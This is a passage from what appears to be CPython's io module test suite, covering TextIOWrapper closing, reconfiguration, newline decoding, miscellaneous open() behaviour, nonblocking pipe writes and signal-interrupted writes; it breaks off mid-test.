def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
        # TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a')
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows and OpenVMS, however, lseek
# somehow succeeds on pipes.
if sys.platform not in ('win32', 'OpenVMS'):
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
@unittest.skipIf(sys.platform == 'OpenVMS',
'OpenVMS os.set_blocking() works only for sockets')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
